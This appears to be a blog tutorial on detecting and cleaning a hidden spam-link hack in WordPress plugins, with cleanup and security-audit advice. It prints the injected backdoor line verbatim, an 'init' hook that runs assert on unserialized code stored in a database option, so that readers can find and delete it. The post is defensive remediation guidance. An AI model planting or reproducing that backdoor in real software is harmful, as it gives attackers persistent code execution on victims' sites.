What is a Hidden Spam Link Hack?

A hidden Spam Link hack is pretty much what it sounds like: a hacker injects code into a website that adds backlinks to other websites onto your site … but you don’t know it because the links display offscreen and most security scans don’t detect it. That is the most annoying part, you usually won’t find this hack unless you manually go looking for it. I’ve seen this happen on sites with premium versions of Wordfence and Sucuri and their scans did not detect the breach. 

How Do I Check for a Hidden Spam Link Hack on a Website?

Luckily this part is pretty easy! Before checking, either log out from the site or open the site in an Incognito Window. In most cases I have seen, the links are not visible if you are logged in as Admin. You can use either Inspect Element or View Page Source to visually scan the code for inappropriate links.

You will be looking for something that looks like this:

hiddenSpamLinkOffScreen-1024x71

Notice the positioning in the CSS. This particular one is set to display at -31787px to the left. That is wayyyyyy offscreen.

Here is a shot of the on-page text while the “sid” left position is set to -31787px:

linksHiddenOffPage-300x232

If you disable the left element like so:

hiddenSpamLinkOnScreen-1024x69

You will then be able to see the spam links on-screen and in your text:

 

linksDisplayedOnPage-300x221

Crap, I Found Hidden Spam Links on my Website! How do I Get Rid of Them?

First, take a backup of the entire site and database and load it on either a test directory on the server (make sure to change the database info in the config files) or locally using XAMPP or a similar program.

Every single one of these hacks that I have come across has been in a plugin. That does not mean that it can’t be found somewhere else, but it is most likely in a plugin that had a security hole. So, begin deactivating your plugins one by one, refreshing and checking your source code after deactivating each one to see if the spam links dissapear.

Once you’ve found the plugin that has the injection in it, take a look at it’s main php file in the plugin’s root directory. For instance, if the plugin is called “This Plugin,” it’s main php file is most likely called thisplugin.php. On the last line of this file is where you will find a line of code like this: 

add_action(‘init’, create_function(”, “@assert(implode(”, unserialize(get_option(‘default_pages’))));”));

@assertimplode-1024x266

This is your needle in the hay stack! Delete this line of code and it will remove the spam links from your site.

Awesome! I’m Done Now, Right?

No, no you aren’t. Your site was breached … you’ve only treated the symptom, not cause. Now you need to notify the developers of whatever plugin this injection was found in and let them know what you found. Unless this was found in a custom plugin that you developed yourself, I would strongly advise against trying to patch the security hole yourself. The main reasons for this are: 1. Any customization you add to the plugin will be wiped out the next time that plugin is updated. 2. The developers of that plugin are more familiar with their creation than you are. You might think you’ve fixed one hole, but you might unknowingly opened up three more. 

After you notify the developers of the affected plugin, determine if the plugin is absolutely necessary. Will the functionality of the site for the users be affected? Will the site still look different on the front end? No to both? Then I’d recommend deactivating and uninstalling the plugin. If you absolutely need the functionality that this compromised plugin offers, can you get that same functionality from a different, more secure plugin? If yes, switch! If you really must keep the offending plugin, I recommend doing daily security checks on your site until the developers have released an update for the plugin.

Whatever decision you end up making about the plugin, I recommend doing a full security audit on the site. This includes changing all passwords for users (on the site and for all accounts on the server) and changing the database username and password. Also make sure your firewalls are enabled and up to date.